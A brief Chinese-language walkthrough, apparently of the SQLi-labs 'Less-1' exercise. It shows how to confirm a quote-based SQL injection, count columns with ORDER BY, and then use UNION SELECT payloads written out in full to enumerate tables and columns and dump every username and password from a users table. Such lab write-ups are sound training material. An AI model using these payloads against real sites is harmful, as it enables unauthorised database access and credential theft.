less 1:
首先页面提示输入id值查询,我们输?id=1,如图:
尝试输入’ 判断注入点,发现报错,说明 ’ 被插入到SQL语句执行,查看错误
在输入的id值1附近出现语法错误,接着我们猜解列数,order by n
测试发现输入id=1’ order by 4 --+报错,所以存在3列回显列数
接着使用联合查询猜解表名,这里的id要改成能报错的id值
0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆出4个表,接着爆列,选择爆users表里的列
0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
废话不多说,爆值
0' union select 1,2,group_concat(username,0x3a,password) from users --+
成功爆出字段值
0x3a代表16进制编码,: 的16进制编码